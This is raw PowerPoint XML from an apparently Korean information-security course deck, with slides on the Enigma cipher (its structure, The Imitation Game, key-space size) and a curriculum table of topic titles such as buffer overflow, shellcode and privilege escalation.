              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>생각지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 못한 일을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>해내니깐요</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4500837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고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>에니그마</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 영화</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DC074EC5-2787-4108-8FBB-BD25F36F0AC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4463994" y="2113575"/>
            <a:ext cx="2687542" cy="381664"/>
            <a:chOff x="1463040" y="2464903"/>
            <a:chExt cx="2687542" cy="381664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="그룹 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BCAD334-A02B-40BA-9FB6-D667E9DF481B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1463040" y="2464904"/>
              <a:ext cx="628153" cy="381663"/>
              <a:chOff x="1463040" y="2464904"/>
              <a:chExt cx="628153" cy="381663"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="사각형: 둥근 모서리 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EC15E06-43E8-4A36-8A51-FB387789EE67}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1463040" y="2464904"/>
                <a:ext cx="628153" cy="381663"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 312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순서도: 추출 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B3FF5C-2C6C-4B2A-8E5E-716BC84839D0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="1715494" y="2570261"/>
                <a:ext cx="174928" cy="170950"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8CFC705-54BD-46CC-804F-00C9A3C1A9E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2091194" y="2464903"/>
              <a:ext cx="2059388" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                  <a:hlinkClick r:id="rId3"/>
                </a:rPr>
                <a:t>IMITATION GAME</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="세계대전을 호령한 암호 장치, 에니그마 : 네이버 포스트">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13304E49-F340-4E60-A2E7-CD62DC7FD7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54" y="1923093"/>
            <a:ext cx="2687542" cy="40313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알라딘: [수입] The Imitation Game (이미테이션 게임) O.S.T [180g 투명 LP]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55597862-CE91-4471-A4AF-A3F568FD9D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1149" y="2840603"/>
            <a:ext cx="2809320" cy="28037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이미테이션 게임', 세상 등졌던 비운의 천재의 부활 - 오마이스타">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EBA7E39-8513-4659-ACB3-1B33E2CB53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93304" y="2495239"/>
            <a:ext cx="3642133" cy="2540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3294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438090572"/>
              </p:ext>
            </p:extLst>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컴퓨터 언어 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>어셈블리어</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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> 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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>버퍼 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>오버플로우란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정보보호의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해킹실습 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>버퍼 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>오버플로우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 도서관 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- Link Library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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>쉘코드란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쉘코드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고전암호 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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 메모장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동적 메모리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현대암호 제작</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dirty="0" err="1"/>
                        <a:t>힙</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>오버플로우란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현대암호 제작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최적화</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고급언어의 약속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포맷스트링</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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Format String Bug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FSB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 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컴퓨터 관리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운영체제와 프로세스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a:t>– </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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>이란</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R </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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권한상승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백도어란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침해예방 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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침해예방 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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비인가 접근공격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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391932466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고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>에니그마</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 구조</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098" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F2CF3D2-9BAB-442F-BB73-E6868774B5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321" y="1993127"/>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E2D953A-C997-43AB-8C9D-B8B84B6B7294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="5941358"/>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자판으로 입력한 알파벳 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>은 플러그보드와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>개의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>회전자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>반전자를 거쳐 알파벳 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>로 암호화되어 출력됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Plugboard: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>치환암호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wheel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>값이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 바뀌는 치환암호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,  Reflector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>암호화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>해독의 키를 같게 해주는 역할</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F999454-62D1-4D89-B05D-AA4051F7871A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7553737" y="3469820"/>
            <a:ext cx="3458819" cy="1208321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="직선 화살표 연결선 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4701C614-3AA0-4509-B6A5-C9C5DEF8F2BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6119853" y="4073981"/>
            <a:ext cx="1433884" cy="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A956160A-116D-49B8-B3AE-B754B6215750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836795" y="2034206"/>
            <a:ext cx="2356961" cy="1255210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="직선 화살표 연결선 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62E09594-AC81-446F-8BE3-D58804FBFA52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279666" y="2480556"/>
            <a:ext cx="155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그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7DE6824-1111-421E-B1E1-4F6DD425933F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9193756" y="1701613"/>
            <a:ext cx="2241605" cy="1587803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371645128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고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>에니그마</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 해독</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AE2D953A-C997-43AB-8C9D-B8B84B6B7294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1153931" y="1960399"/>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키의 개수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17,576</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>  *  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>  *  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>100,391,791,500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>가지  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>- brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>은 불가능함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>회전자의 초기 위치 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>) * ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>개 회전자의 배열 순서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>) * ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>배선반</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 연결 방식 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="손그림 일러스트 강좌: 책 그리기 - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5372537D-DD59-416A-A242-C80E31CC4A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319" t="26767" r="19159" b="19668"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2131941" y="2992014"/>
            <a:ext cx="818984" cy="543636"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DFC0060-A5CA-4B41-A333-4D90DB10F95A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690397" y="2955537"/>
            <a:ext cx="818984" cy="580113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="직선 화살표 연결선 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30CFC10B-BA81-496E-98D3-0502971B7310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
